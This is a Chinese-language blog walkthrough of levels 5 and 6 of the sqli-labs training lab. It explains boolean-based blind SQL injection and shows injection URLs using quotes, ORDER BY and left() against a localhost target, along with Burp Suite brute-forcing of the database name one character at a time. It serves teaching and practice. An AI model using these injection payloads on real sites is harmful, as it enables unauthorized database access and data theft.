码迷,mamicode.com
首页 > 数据库 > 详细

sqli-labs(5-6关)

时间:2020-02-04 15:57:51      阅读:99      评论:0      收藏:0      [点我收藏+]

标签:正则表达式   通过   OLE   order   exp   security   相同   漏洞   字符串   

知识点:

  1.left函数,left(a,b)从左侧截取a的前b位,正确则返回1,错误则返回0。

     技术图片

  2.regexp函数,例如:select user()regexp ‘r’;user的结果是root,regexp为匹配root的正则表达式。

          技术图片

  3.like函数,例如:select user()like ‘ro%’;与regexp函数相似

    技术图片

  4.substr(a,b,c),从位置b开始,截取a字符串c位长度 

   技术图片

  5.ascii函数,将某个字符串转化为ascii值

    技术图片

   6.chr(数字)或者是ord(‘字母’),使用python中的这两个函数可以判断当前的ascii值是多少

      技术图片

   7.以security库为例:

      select left(database(),1)=‘s’;  判断前一位是否是s

      select database() regepx ‘s‘;  匹配第一个字符是否是s

      select database() like ‘s%‘;  匹配第一个字符是否是s

      select substr((select database()),1,1)=‘s‘;  匹配第一个字符是否是s

      select substr((select database(),1,3)=‘sec‘;  匹配前三个字符是否是sec

      select ascii(substr((select database()),1,1));  直接回显是115

         select ascii(substr((select database()),1,1))>110;  如果大于110,就返回1,否则返回0

第五关(Less-5):boolean注入

  1.根据提示,输入http://127.0.0.1/sqli-labs-master/Less-5/?id=1

技术图片

  2.在输入id为1000,发现没有回显值

技术图片

  通过1,2发现,正确是会返回结果You are in......,错误是无返回结果

  3.加上单引号,输入http://127.0.0.1/sqli-labs-master/Less-5/?id=1‘,出现错误,报错信息显示在1附近多余一个分号,故存在SQL注入漏洞

技术图片

  4.使用order查看列数,输入http://127.0.0.1/sqli-labs-master/Less-5/?id=1‘ order by 3 --+,显示正常

技术图片

  5.将3改为4,输入 http://127.0.0.1/sqli-labs-master/Less-5/?id=1‘ order by 4 --+,显示Unkown,说明有三列

技术图片

  6. 不能使用union select进行联合查询,因为没有输出用户和密码,正确输出You are in...,错误不会显示

  7.使用left函数,判断第一位是否是s,返回正常,说明第一位是s

技术图片

  8.接下来进行第二位的猜测,输入se,猜测正确,前两位是se

技术图片

  9.使用BurpLoader,打开火狐的代理。当第一位不知道时,输入http://127.0.0.1/sqli-labs-master/Less-5/?id=1‘and left((select database()),1)=‘a‘ --+,抓包得到数据

技术图片

  10.将其发送至爆破模块,首先清楚美元符号

技术图片

  11.我们爆破的是第一位的值,即报文中的a,将a作为变量添加美元符号

技术图片

 

  12.点击payloads选择

技术图片

  13.点击Options,将线程改为30,进行暴力破解

技术图片

  14.通过返回的长度进行观察,s返回的长度是1009,而其余是1025

技术图片

  15.查看返回1009的情况下的数据,出现You are in...,说明数据正确,第一位即为s

技术图片

  16.第一位即为s,接下来进行第二位的猜解,

技术图片

   17.点击payloads选择

技术图片

   18.点击Options,调节线程,然后进行暴力破解

技术图片

  19.观察长度发现,e的长度与其他不同,查看返回结果,发现You are in...,说明第二位即为e,其余爆破步骤均相同,即可得到security库名。

技术图片

第六关(Less-6):

  1.根据提示,输入http://127.0.0.1/sqli-labs-master/Less-6/?id=1,根据第五关可知,显示You are in...为正常

技术图片

  2.加上单引号,输入http://127.0.0.1/sqli-labs-master/Less-6/?id=1‘,显示正常

技术图片

  3.将单引号改为双引号,输入http://127.0.0.1/sqli-labs-master/Less-6/?id=1",出现错误,可知存在注入漏洞

技术图片

  4.使用order by查看有几列,输入http://127.0.0.1/sqli-labs-master/Less-6/?id=1" order by 3 --+,返回正常

技术图片

  5.将3改为4,输入http://127.0.0.1/sqli-labs-master/Less-6/?id=1" order by 4 --+,发现错误,所以存在三列

技术图片

  6.使用BurpLoader,打开火狐的代理。当第一位不知道时,输入http://127.0.0.1/sqli-labs-master/Less-6/?id=1‘and left((select database()),1)=‘a‘ --+,抓包得到数据

技术图片

  7.将其发送至爆破模块,首先清楚美元符号

技术图片

  8.我们爆破的是第一位的值,即报文中的a,将a作为变量添加美元符号

技术图片

  9.设置payloads和Options

技术图片 技术图片

   10.进行暴力破解,观察长度可知,s与其余长度均不相同,再查看返回数据可知,出现You are in......,可知第一位即为s,其余为爆破步骤相同

技术图片

 

 

 

 

 

 

 

 

 

 

 

 

 

 

  

sqli-labs(5-6关)

标签:正则表达式   通过   OLE   order   exp   security   相同   漏洞   字符串   

原文地址:https://www.cnblogs.com/mxm0117/p/12245538.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!